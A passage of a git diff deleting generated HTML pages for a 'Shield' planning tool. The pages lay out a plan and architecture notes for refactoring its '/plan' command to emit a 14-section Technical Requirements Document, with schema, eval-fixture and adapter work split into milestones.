-          "count": 0,
-          "entries": []
-        }
-      },
-      "updated": "2026-06-01T11:49:28+00:00"
-    }
-  ]
-};
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html b/docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html
deleted file mode 100644
index 2fe91466..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html
+++ /dev/null
@@ -1,162 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Architecture — plan-trd-refactor-20260524</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#why-this-refactor">Why this refactor</a>
-</li>
-<li><a href="#how-the-implementation-breaks-down">How the implementation breaks down</a>
-</li>
-<li><a href="#key-architectural-decisions">Key architectural decisions</a>
-</li>
-<li><a href="#deliverables-per-milestone">Deliverables (per milestone)</a>
-<ul>
-<li><a href="#m1--trd-cutover-one-pr">M1 — TRD cutover (one PR)</a></li>
-<li><a href="#m2--review--sync-wiring-one-pr">M2 — Review + sync wiring (one PR)</a></li>
-<li><a href="#m3--drift--duplication-hardening-one-pr">M3 — Drift + duplication hardening (one PR)</a></li>
-</ul>
-</li>
-<li><a href="#rollback-strategy">Rollback strategy</a>
-</li>
-<li><a href="#out-of-scope">Out of scope</a>
-</li>
-<li><a href="#what-to-do-next">What to do next</a>
-</li>
-</ul>
-</nav>
-<h1 id="plan-architecture--plan-trd-refactor">Plan Architecture — <code>/plan</code> TRD refactor</h1>
-<p><strong>Feature:</strong> <code>plan-trd-refactor-20260524</code>
-<strong>Source research:</strong> <a href="../research.md"><code>research.md</code></a> — read this first; it is the authoritative source for design decisions, citations, and rejected alternatives.
-<strong>Date:</strong> 2026-05-24</p>
-<blockquote>
-<p>This document is the <strong>why &amp; how</strong> companion to <code>plan.json</code>. For the <strong>what to do</strong> breakdown (epics, stories, ACs), see <code>plan.json</code> and the rendered <a href="../plan.md"><code>plan.md</code></a>.</p>
-<p><strong>Note on path layout:</strong> <code>/plan</code> today still emits <code>plan-architecture.md</code>. This plan run uses today's <code>/plan</code> to plan the refactor of <code>/plan</code>. After EPIC-1-S2 lands, future plan runs will emit <code>trd.md</code> in this slot instead.</p>
-</blockquote>
-<h2 id="why-this-refactor">Why this refactor</h2>
-<p><code>/plan</code> currently emits a stories-first work-breakdown plus a free-form <code>plan-architecture.md</code> companion. The current artifact is loose and de-facto ADR-flavored — well-suited to infra work but missing the structural rigor (NFRs, Cross-Cutting Concerns, first-class Milestones) that backend work needs. The refactor introduces a <strong>unified 14-section Technical Requirements Document</strong> (TRD) — grounded in IEEE 1016 + the reference TRD template (synthesized during research) + Google/Uber/Larson/Orosz modern practice — that replaces <code>plan-architecture.md</code> for <strong>both backend and infrastructure</strong> work. Domain-aware prompting per section surfaces the right interpretation (e.g., §11 APIs = HTTP contracts for backend, module interfaces + cloud-API surface for infra), and an explicit <code>n/a — &lt;reason&gt;</code> escape handles sections that genuinely don't apply (e.g., §4 Product Journey on a pure-state infra change). The strongest property of today's <code>plan-architecture.md</code> — Rollback Strategy — is promoted to first-class §14. LLDs are per-component (C4 Container/Component) and authored separately by a future <code>/lld &lt;component&gt;</code> command; typically backend-only since infra code is declarative-spec-as-code. This plan run only emits TODO placeholders for LLD references.</p>
-<p>Full rationale, alternatives considered, and citations are in <code>research.md</code>. This document does not restate them.</p>
-<h2 id="how-the-implementation-breaks-down">How the implementation breaks down</h2>
-<p>Three milestones, five epics, sixteen stories (post-review). Sequencing is enforced by milestone <code>depends_on</code> in <code>plan.json</code>. Plan reflects the 2026-05-25 plan-review feedback (composite B / Ready; 6 P0 + 12 of 15 P1 recommendations folded in).</p>
-<pre><code>M1 TRD cutover                                  ← P0 (ship together in one PR)
-├─ EPIC-1: TRD generation and storage
-│   ├─ S1 Author the canonical 14-section TRD template
-│   ├─ S2 Update /plan to emit trd.md (unified backend + infra + mixed)
-│   ├─ S3 Update existing-feature behavior on re-run
-│   └─ S4 Bump plugin version per CLAUDE.md mandate          (new — P1-12)
-├─ EPIC-2: Story schema and design traceability
-│   ├─ S1 Extend plan.json schema with optional design_refs[]
-│   ├─ S2 Populate design_refs[] when /plan has TRD context
-│   └─ S3 Add JSON Schema validator for plan.json            (new — P1-7)
-└─ EPIC-3: Eval coverage for TRD format
-    ├─ S1 Author positive TRD eval fixtures (backend + infra + mixed)
-    ├─ S2 Author 16 negative fixtures (14 missing + drift + vague-TBD)
-    └─ S3 Wire eval into recurring CI + RED-GREEN paper trail
-
-M2 Review + sync wiring                         ← P1 (follows M1)
-└─ EPIC-4: /plan-review and /pm-sync wiring
-    ├─ S0 Scaffold Jira / Confluence / Notion adapter packages   (new — P0-2)
-    ├─ S1 Add 14-section presence rule + stale-anchor rule
-    ├─ S2 Add PRD↔TRD duplication-detection rule
-    └─ S3 /pm-sync emits design_refs[] as web links with idempotent upsert
-
-M3 Drift + duplication hardening                ← P2 (follows M2)
-└─ EPIC-5: Drift + duplication hardening
-    ├─ S1 Add last_aligned_with metadata to plan.json
-    └─ S2 Add implementation-manual / pseudo-code lint rule
-</code></pre>
-<h2 id="key-architectural-decisions">Key architectural decisions</h2>
-<p>The TRD section list, anchor strategy, <code>design_refs[]</code> shape, de-duplication contract, and failure-mode countermeasures are all locked in <code>research.md</code>. The decisions specific to this implementation plan are:</p>
-<ol>
-<li><strong>Direct cutover, no feature flag.</strong> EPIC-1-S2 swaps <code>plan-architecture.md</code> for <code>trd.md</code> in <code>/plan</code>'s output set. No <code>.shield.json</code> toggle.</li>
-<li><strong>One TRD, two domains.</strong> Same 14-section template applies to backend and infra work. <code>/plan</code>'s SKILL.md carries domain-aware prompting per section (backend interpretation + infra interpretation), and the eval accepts <code>n/a — &lt;reason&gt;</code> as an escape for sections that genuinely don't apply (e.g., §4 Product Journey on a pure-state infra change).</li>
-<li><strong>§14 Rollback Strategy is a first-class section</strong> — preserves the strongest property of today's <code>plan-architecture.md</code>.</li>
-<li><strong>Old feature folders are left untouched.</strong> EPIC-1-S3 explicitly guards against deleting existing <code>plan-architecture.md</code> files. Git history is the archive.</li>
-<li><strong>M1 ships as a single PR.</strong> Generator, schema, and eval land together. The eval cannot ship before the generator (no fixture to validate); the generator should not ship without the eval (regression risk on first re-run). Land them atomically.</li>
-<li><strong><code>design_refs[]</code> is additive and zero-risk.</strong> Bumps sidecar schema 1.1 → 1.2. Adapters that don't understand the field ignore it; no <code>/pm-sync</code> schema break (EPIC-4-S3 is the additive forward-link wiring).</li>
-<li><strong>LLD references are TODO placeholders in v1.</strong> <code>design_refs[]</code> entries with <code>doc: &quot;lld&quot;</code> carry <code>anchor_url: null</code> and <code>label: &quot;TODO: link when /lld &lt;component&gt; lands&quot;</code>. When <code>/lld</code> ships in a later epic, those placeholders get resolved. LLDs are typically backend-only.</li>
-<li><strong>Eval is the structural enforcement mechanism.</strong> Per CLAUDE.md eval-coverage mandate, M1 ships with <strong>two</strong> positive fixtures (one backend, one infra), one missing-section negative per required section, one drift-by-addition negative, and one &quot;vague-prose-instead-of-<code>n/a</code>&quot; negative. RED → GREEN paper trail captured in the PR body (EPIC-3-S3).</li>
-</ol>
-<h2 id="deliverables-per-milestone">Deliverables (per milestone)</h2>
-<h3 id="m1--trd-cutover-one-pr">M1 — TRD cutover (one PR)</h3>
-<ul>
-<li><code>shield/commands/plan.md</code> — emits <code>trd.md</code> not <code>plan-architecture.md</code></li>
-<li><code>shield/skills/general/plan-docs/SKILL.md</code> — 14-section TRD template + generation prompt with <strong>domain-aware section guidance</strong> (backend interpretation + infra interpretation per section)</li>
-<li><code>shield/skills/general/plan-docs/sidecar-schema.md</code> — schema bumped to 1.2 with <code>design_refs[]</code> documented</li>
-<li><code>shield/schema/output-paths.yaml</code> — <code>plan_arch_md</code>/<code>plan_arch_html</code> replaced by <code>plan_trd_md</code>/<code>plan_trd_html</code></li>
-<li><code>shield/evals/plan-trd.yaml</code> — 2 positives (backend + infra) + 14 missing-section negatives + 1 drift-by-addition negative + 1 vague-prose-instead-of-<code>n/a</code> negative</li>
-<li><code>shield/evals/plan-trd/fixtures/positive-backend/</code> — full 14-section TRD fixture for a backend feature</li>
-<li><code>shield/evals/plan-trd/fixtures/positive-infra/</code> — full 14-section TRD fixture for an infra change (with <code>n/a — &lt;reason&gt;</code> on at least one section)</li>
-<li><code>shield/evals/plan-trd/fixtures/missing-*/</code> — 14 missing-section negative fixtures</li>
-<li><code>shield/evals/plan-trd/fixtures/extra-section/</code> — drift-by-addition negative fixture</li>
-<li><code>shield/evals/plan-trd/fixtures/vague-tbd/</code> — section with &quot;TBD&quot; instead of <code>n/a — &lt;reason&gt;</code>; eval must fail</li>
-</ul>
-<h3 id="m2--review--sync-wiring-one-pr">M2 — Review + sync wiring (one PR)</h3>
-<ul>
-<li><code>shield/skills/general/plan-review/SKILL.md</code> — 14-section presence rule + stale-anchor rule + duplication-detection rule</li>
-<li><code>shield/commands/pm-sync.md</code> — describes <code>design_refs[]</code> forwarding</li>
-<li><code>shield/adapters/&lt;each&gt;/...</code> — Confluence, Jira, ClickUp, Notion adapters forward <code>design_refs[]</code> as web links</li>
-<li><code>shield/evals/plan-review-trd.yaml</code> — fixtures exercising both new review rules</li>
-<li>Per-adapter eval fixtures</li>
-</ul>
-<h3 id="m3--drift--duplication-hardening-one-pr">M3 — Drift + duplication hardening (one PR)</h3>
-<ul>
-<li><code>shield/skills/general/plan-docs/sidecar-schema.md</code> — schema bumped to 1.3 with <code>last_aligned_with</code></li>
-<li><code>shield/skills/general/implement/SKILL.md</code> (or equivalent) — updates <code>last_aligned_with</code> on story close</li>
-<li><code>shield/skills/general/plan-review/SKILL.md</code> — implementation-manual lint rule</li>
-<li>Eval fixtures for both new rules</li>
-</ul>
-<h2 id="rollback-strategy">Rollback strategy</h2>
-<p>The refactor is a direct cutover; reversibility cost is low.</p>
-<ul>
-<li><strong>Forward:</strong> Three PRs (M1, M2, M3), sequenced by <code>depends_on</code>.</li>
-<li><strong>Reversal:</strong> Revert <code>plan-docs/SKILL.md</code> to the pre-refactor template + restore <code>plan-architecture.md</code> generation. Existing <code>trd.md</code> files in feature folders remain readable. <code>design_refs[]</code> is optional everywhere, so removing it is a no-op for downstream adapters. <code>last_aligned_with</code> is also optional and reverting drops it without breaking older sidecars.</li>
-<li><strong>No migration:</strong> Pre-refactor feature folders keep their <code>plan-architecture.md</code> — no rewrite, no script.</li>
-</ul>
-<h2 id="out-of-scope">Out of scope</h2>
-<p>The following are deferred and tracked in <code>plan.json</code> <code>metadata.out_of_scope</code>:</p>
-<ul>
-<li><code>/lld &lt;component&gt;</code> command (template locked, command is a separate epic).</li>
-<li>Adapter auto-creation of Confluence/Notion design-doc pages.</li>
-<li>Structured ClickUp/Notion relationships beyond URL fields.</li>
-<li>Migration tool for existing <code>plan-architecture.md</code>.</li>
-</ul>
-<h2 id="what-to-do-next">What to do next</h2>
-<ul>
-<li><code>/plan-review docs/shield/plan-trd-refactor-20260524/plan.json</code> — multi-agent review against the rubric.</li>
-<li><code>/pm-sync docs/shield/plan-trd-refactor-20260524/plan.json --tool clickup</code> (or jira, notion) — sync stories to your PM tool.</li>
-<li><code>/implement</code> — TDD-driven implementation, starting with EPIC-3-S1 (positive eval fixture) to anchor the RED → GREEN trail.</li>
-</ul>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/plan.html b/docs/shield/plan-trd-refactor-20260524/outputs/plan.html
deleted file mode 100644
index 722fc9fe..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/plan.html
+++ /dev/null
@@ -1,430 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Plan — plan-trd-refactor-20260524</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#milestones">Milestones</a>
-</li>
-<li><a href="#epic-1--trd-generation-and-storage----m1">EPIC-1 · TRD generation and storage  ·  M1</a>
-<ul>
-<li><a href="#epic-1-s1--author-the-canonical-14-section-trd-template-with-domain-aware-prompting----priority-high">EPIC-1-S1 · Author the canonical 14-section TRD template with domain-aware prompting  ·  priority: high</a></li>
-<li><a href="#epic-1-s2--update-plan-to-emit-trdmd-unified-backend--infra----priority-high">EPIC-1-S2 · Update /plan to emit trd.md (unified backend + infra)  ·  priority: high</a></li>
-<li><a href="#epic-1-s4--bump-plugin-version-per-claudemd-mandate----priority-high">EPIC-1-S4 · Bump plugin version per CLAUDE.md mandate  ·  priority: high</a></li>
-<li><a href="#epic-1-s3--update-existing-feature-behavior-on-re-run----priority-medium">EPIC-1-S3 · Update existing-feature behavior on re-run  ·  priority: medium</a></li>
-</ul>
-</li>
-<li><a href="#epic-2--story-schema-and-design-traceability----m1">EPIC-2 · Story schema and design traceability  ·  M1</a>
-<ul>
-<li><a href="#epic-2-s1--extend-planjson-schema-with-optional-design_refs----priority-high">EPIC-2-S1 · Extend plan.json schema with optional design_refs[]  ·  priority: high</a></li>
-<li><a href="#epic-2-s2--populate-design_refs-when-plan-has-trd-context----priority-high">EPIC-2-S2 · Populate design_refs[] when /plan has TRD context  ·  priority: high</a></li>
-<li><a href="#epic-2-s3--add-json-schema-validator-for-planjson----priority-high">EPIC-2-S3 · Add JSON Schema validator for plan.json  ·  priority: high</a></li>
-</ul>
-</li>
-<li><a href="#epic-3--eval-coverage-for-trd-format----m1">EPIC-3 · Eval coverage for TRD format  ·  M1</a>
-<ul>
-<li><a href="#epic-3-s1--author-positive-trd-eval-fixtures-backend--infra----priority-high">EPIC-3-S1 · Author positive TRD eval fixtures (backend + infra)  ·  priority: high</a></li>
-<li><a href="#epic-3-s2--author-missing-section--drift--vague-tbd-negative-fixtures----priority-high">EPIC-3-S2 · Author missing-section + drift + vague-TBD negative fixtures  ·  priority: high</a></li>
-<li><a href="#epic-3-s3--wire-eval-into-ci--red-green-paper-trail----priority-high">EPIC-3-S3 · Wire eval into CI / RED-GREEN paper trail  ·  priority: high</a></li>
-</ul>
-</li>
-<li><a href="#epic-4--plan-review-and-pm-sync-wiring----m2">EPIC-4 · /plan-review and /pm-sync wiring  ·  M2</a>
-<ul>
-<li><a href="#epic-4-s0--scaffold-jira--confluence--notion-adapter-packages----priority-high">EPIC-4-S0 · Scaffold Jira / Confluence / Notion adapter packages  ·  priority: high</a></li>
-<li><a href="#epic-4-s1--add-14-section-presence-rule--stale-anchor-rule-to-plan-review----priority-high">EPIC-4-S1 · Add 14-section presence rule + stale-anchor rule to /plan-review  ·  priority: high</a></li>
-<li><a href="#epic-4-s2--add-prdtrd-duplication-detection-rule-to-plan-review----priority-medium">EPIC-4-S2 · Add PRD↔TRD duplication-detection rule to /plan-review  ·  priority: medium</a></li>
-<li><a href="#epic-4-s3--pm-sync-emits-design_refs-as-web-links-with-idempotent-upsert----priority-high">EPIC-4-S3 · /pm-sync emits design_refs[] as web links with idempotent upsert  ·  priority: high</a></li>
-</ul>
-</li>
-<li><a href="#epic-5--drift--duplication-hardening----m3">EPIC-5 · Drift + duplication hardening  ·  M3</a>
-<ul>
-<li><a href="#epic-5-s1--add-last_aligned_with-metadata-to-planjson----priority-medium">EPIC-5-S1 · Add last_aligned_with metadata to plan.json  ·  priority: medium</a></li>
-<li><a href="#epic-5-s2--add-implementation-manual--pseudo-code-lint-rule-to-plan-review----priority-low">EPIC-5-S2 · Add implementation-manual / pseudo-code lint rule to /plan-review  ·  priority: low</a></li>
-</ul>
-</li>
-<li><a href="#out-of-scope-locked">Out of scope (locked)</a>
-</li>
-<li><a href="#next-steps">Next steps</a>
-</li>
-</ul>
-</nav>
-<h1 id="plan--plan-trd-refactor">Plan — <code>/plan</code> TRD refactor</h1>
-<p><strong>Feature:</strong> <code>plan-trd-refactor-20260524</code> · <strong>Phase:</strong> v1 cutover · <strong>Source:</strong> <a href="../research.md"><code>research.md</code></a> · <a href="../plan-architecture.md"><code>plan-architecture.md</code></a>
-<strong>Sidecar:</strong> <a href="../plan.json"><code>plan.json</code></a> (schema v1.1)</p>
-<h2 id="milestones">Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Outcome</th>
-<th>Depends on</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><strong>M1</strong></td>
-<td>TRD cutover</td>
-<td><code>/plan</code> emits <code>trd.md</code> (14 sections, stable anchors, domain-aware prompting for backend/infra/mixed, atomic write, provenance stamp); <code>plan.json</code> carries optional <code>design_refs[]</code>; JSON schema validator wired; recurring CI gate runs the eval; coverage = 3 positives (backend + infra + mixed) + 16 negatives.</td>
-<td>—</td>
-</tr>
-<tr>
-<td><strong>M2</strong></td>
-<td>Review + sync wiring</td>
-<td><code>/plan-review</code> grades against 14-section rubric (with <code>n/a — &lt;reason&gt;</code> escape) + duplication rule + stale-anchor rule; <code>/pm-sync</code> adapters forward <code>design_refs[]</code> as web links with idempotent upsert (sha256 globalId).</td>
-<td>M1</td>
-</tr>
-<tr>
-<td><strong>M3</strong></td>
-<td>Drift + duplication hardening</td>
-<td><code>last_aligned_with</code> metadata + implementation-manual lint rule.</td>
-<td>M2</td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h2 id="epic-1--trd-generation-and-storage----m1">EPIC-1 · TRD generation and storage  ·  M1</h2>
-<h3 id="epic-1-s1--author-the-canonical-14-section-trd-template-with-domain-aware-prompting----priority-high">EPIC-1-S1 · Author the canonical 14-section TRD template with domain-aware prompting  ·  <code>priority: high</code></h3>
-<p>Encode the 14-section TRD template (Document Overview through Rollback Strategy) in <code>plan-docs/SKILL.md</code> or a sibling <code>templates.md</code>. Each section has TWO authoring-guidance paragraphs: one for backend interpretation, one for infra interpretation. Sections that may not apply to one domain are documented with the <code>n/a — &lt;reason&gt;</code> escape pattern from the LLD sample's §12. Each section header in the emitted markdown carries an explicit <code>{#section-id}</code> kebab-case anchor.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Add a 'TRD template' subsection to <code>shield/skills/general/plan-docs/SKILL.md</code> (or extend <code>templates.md</code>) listing all 14 section titles, slug IDs, and per-domain authoring guidance sourced from <code>research.md §What the Industry Recommends</code>.</li>
-<li>Define the canonical slug allow-list: <code>['document-overview','problem-statement','objective-scope','product-journey','functional-requirements','non-functional-requirements','high-level-design','alternatives-considered','cross-cutting-concerns','milestones','apis-involved','open-questions','references','rollback-strategy']</code>.</li>
-<li>Document the explicit <code>{#section-id}</code> markdown-anchor convention used by <code>/plan</code> output.</li>
-<li>Document the <code>n/a — &lt;reason&gt;</code> escape: any section may declare <code>n/a — &lt;reason&gt;</code> when it genuinely doesn't apply (typical use: §4 on pure-infra plans). Vague TBDs and silent omissions are not allowed.</li>
-<li>Per-section domain guidance must explicitly call out where the infra interpretation differs from backend (notably §4, §5, §6, §7, §11, §14).</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>shield/skills/general/plan-docs/SKILL.md</code> (or <code>templates.md</code>) contains the 14-section TRD template with slug IDs and per-domain authoring guidance.</li>
-<li>The slug allow-list is published as a machine-readable list (YAML or JSON sidecar under <code>shield/schema/</code>) so the eval can import it; the list has exactly 14 entries.</li>
-<li>A reader following <code>plan-docs/SKILL.md</code> can identify which section a given heading belongs to AND which domain interpretation applies, without re-reading <code>research.md</code>.</li>
-<li>The <code>n/a — &lt;reason&gt;</code> escape pattern is documented with at least one worked example per applicable section.</li>
-</ul>
-<h3 id="epic-1-s2--update-plan-to-emit-trdmd-unified-backend--infra----priority-high">EPIC-1-S2 · Update /plan to emit trd.md (unified backend + infra)  ·  <code>priority: high</code></h3>
-<p>Modify <code>shield/commands/plan.md</code> and <code>shield/skills/general/plan-docs/SKILL.md</code> so <code>/plan</code> writes <code>trd.md</code> with all 14 sections for <strong>both backend and infrastructure features</strong>. Stop emitting <code>plan-architecture.md</code> going forward. Direct cutover: no feature flag, no side-by-side period. The generation prompt detects the dominant domain and surfaces the right per-section authoring guidance (backend vs infra) for the LLM.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Replace the 'Generate plan-architecture.md' step in <code>shield/commands/plan.md</code> with 'Generate trd.md per the unified 14-section template'.</li>
-<li>Update <code>shield/skills/general/plan-docs/SKILL.md</code> generation prompt to walk the 14 sections, select the domain-appropriate authoring guidance per section, and emit explicit <code>{#section-id}</code> anchors.</li>
-<li>Domain detection: reuse the existing detection (<code>*.tf</code> / <code>atmos.yaml</code> / <code>Chart.yaml</code> → infra; <code>pom.xml</code> / <code>pyproject.toml</code> / <code>package.json</code> / <code>go.mod</code> → backend). Mixed → annotate per section.</li>
-<li>Update <code>shield/schema/output-paths.yaml</code>: replace <code>plan_arch_md</code> with <code>plan_trd_md</code> (<code>{output_dir}/{feature}/trd.md</code>) and <code>plan_arch_html</code> with <code>plan_trd_html</code> (<code>{output_dir}/{feature}/outputs/trd.html</code>). Mirror in <code>shield/commands/plan.md</code> outputs: frontmatter.</li>
-<li>Update the render-markdown helper invocation in <code>plan-docs/SKILL.md</code> to render <code>trd.md</code> to <code>outputs/trd.html</code>.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Running <code>/plan</code> in a fresh feature folder writes <code>docs/shield/{feature}/trd.md</code> and <code>docs/shield/{feature}/outputs/trd.html</code>.</li>
-<li><code>/plan</code> no longer writes <code>plan-architecture.md</code> anywhere.</li>
-<li><code>shield/schema/output-paths.yaml</code> lists <code>plan_trd_md</code> and <code>plan_trd_html</code>; <code>plan_arch_md</code> and <code>plan_arch_html</code> are removed.</li>
-<li>Running <code>/plan</code> on a feature folder with only infra markers produces a TRD where the infra interpretation is reflected in §4–7, §11, and §14 prose; sections like §4 may legitimately carry <code>n/a — &lt;reason&gt;</code>.</li>
-<li>Running <code>/plan</code> on a feature folder with only backend markers produces a TRD where the backend interpretation is reflected in §4–7, §11, and §14 prose.</li>
-</ul>
-<h3 id="epic-1-s4--bump-plugin-version-per-claudemd-mandate----priority-high">EPIC-1-S4 · Bump plugin version per CLAUDE.md mandate  ·  <code>priority: high</code></h3>
-<p>CLAUDE.md &quot;Plugin isolation / Versioning&quot; requires bumping <code>.claude-plugin/marketplace.json</code> and <code>pyproject.toml</code> in the same commit as any plugin update. Added per SRE P1-12 + DX P2.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Bump <code>.claude-plugin/marketplace.json</code> version field for the Shield plugin entry.</li>
-<li>Bump <code>pyproject.toml</code> version in any package modified (<code>shield/adapters/clickup/pyproject.toml</code>, plus new adapter packages from EPIC-4-S0).</li>
-<li>Update Shield's user-facing CHANGELOG (or create one if absent) noting the cutover from <code>plan-architecture.md</code> to <code>trd.md</code> and the schema 1.1 → 1.2 bump.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>The M1 PR includes both version bumps in the same commit as the SKILL.md changes.</li>
-<li>CHANGELOG mentions the cutover and the schema bump.</li>
-</ul>
-<hr />
-<h3 id="epic-1-s3--update-existing-feature-behavior-on-re-run----priority-medium">EPIC-1-S3 · Update existing-feature behavior on re-run  ·  <code>priority: medium</code></h3>
-<p>When <code>/plan</code> is re-run in a feature folder that has both an old <code>plan-architecture.md</code> and a new <code>trd.md</code> (or only an old <code>plan-architecture.md</code>), make the behavior deterministic: leave old <code>plan-architecture.md</code> untouched, write/overwrite <code>trd.md</code>. Old folders remain readable; no migration.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Add a guard in <code>plan-docs/SKILL.md</code> that does not delete <code>plan-architecture.md</code> if it exists.</li>
-<li>Document the re-run behavior in <code>shield/commands/plan.md</code> ('plan-architecture.md is no longer generated; existing files are left in place').</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Re-running <code>/plan</code> on a feature folder with an existing <code>plan-architecture.md</code> does not delete or modify that file.</li>
-<li>The new <code>trd.md</code> is written alongside (or overwrites prior <code>trd.md</code>).</li>
-</ul>
-<hr />
-<h2 id="epic-2--story-schema-and-design-traceability----m1">EPIC-2 · Story schema and design traceability  ·  M1</h2>
-<h3 id="epic-2-s1--extend-planjson-schema-with-optional-design_refs----priority-high">EPIC-2-S1 · Extend plan.json schema with optional design_refs[]  ·  <code>priority: high</code></h3>
-<p>Add an optional <code>design_refs[]</code> array to each story in the <code>plan.json</code> sidecar. Shape: <code>{doc, component?, section_id, anchor_url, label}</code>. Bump sidecar schema to 1.2; preserve back-compat (missing field is ignored).</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Edit <code>shield/skills/general/plan-docs/sidecar-schema.md</code> to add <code>design_refs[]</code> field on the story record with the field shape above.</li>
-<li>Bump version key in the schema example from <code>'1.1'</code> to <code>'1.2'</code>.</li>
-<li>Document back-compat: 1.1/1.0 sidecars without <code>design_refs[]</code> remain valid.</li>
-<li>Add a 'design_refs[] field' subsection explaining the per-field semantics (<code>doc ∈ {trd, lld, prd}</code>; <code>component</code> for LLD scoping; <code>anchor_url</code> stable across heading renames).</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>shield/skills/general/plan-docs/sidecar-schema.md</code> documents <code>design_refs[]</code> with version 1.2.</li>
-<li>A <code>plan.json</code> with no <code>design_refs[]</code> still validates as 1.2.</li>
-<li>A <code>plan.json</code> with <code>design_refs[]</code> populated validates as 1.2.</li>
-</ul>
-<h3 id="epic-2-s2--populate-design_refs-when-plan-has-trd-context----priority-high">EPIC-2-S2 · Populate design_refs[] when /plan has TRD context  ·  <code>priority: high</code></h3>
-<p>When <code>/plan</code> generates stories, populate each story's <code>design_refs[]</code> with a forward link to the TRD section it implements. <code>lld</code> refs are emitted as TODO entries until <code>/lld</code> lands.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Update <code>plan-docs/SKILL.md</code> generation prompt: for each story, identify which TRD §7 (HLD), §10 (Milestones), or §11 (APIs Involved) section the story implements, and emit a <code>design_refs</code> entry pointing at <code>trd.md#{section-id}</code>.</li>
-<li>For LLD references, emit placeholder entries with <code>doc='lld'</code>, <code>component=null</code>, <code>anchor_url=null</code>, <code>label='TODO: link when /lld &lt;component&gt; lands'</code>.</li>
-<li>Document the heuristic for picking <code>section_id</code> (story title keyword → TRD section anchor).</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>A <code>/plan</code> run on a feature with a <code>trd.md</code> emits at least one <code>design_refs</code> entry per story pointing at a real <code>trd.md</code> anchor.</li>
-<li>Each story has at least one TRD design_ref; LLD refs are emitted as TODO placeholders.</li>
-<li>Re-running <code>/plan</code> does not duplicate entries; existing entries are preserved or updated in place.</li>
-</ul>
-<hr />
-<h3 id="epic-2-s3--add-json-schema-validator-for-planjson----priority-high">EPIC-2-S3 · Add JSON Schema validator for plan.json  ·  <code>priority: high</code></h3>
-<p>Two version bumps (1.1 → 1.2 → 1.3) without a machine-readable validator is the drift inflection. Add a pydantic/jsonschema validator now, invoked by <code>/plan-review</code> and the eval runner. New per Backend P1-7.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Create <code>shield/scripts/validate_plan.py</code> using <code>pydantic</code> (preferred — already in deps via clickup adapter) or <code>jsonschema</code>.</li>
-<li>Schema definition lives at <code>shield/schema/plan-sidecar.schema.json</code> (machine-readable counterpart to <code>sidecar-schema.md</code>).</li>
-<li>Validator is invoked by <code>/plan-review</code> (first check, before rubric) and the eval runner (in EPIC-3-S3 CI workflow).</li>
-<li>Reject unknown <code>doc</code> enum values, enforce <code>design_refs[]</code> cardinality (min 1 per story when populated), reject sidecar versions newer than current.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
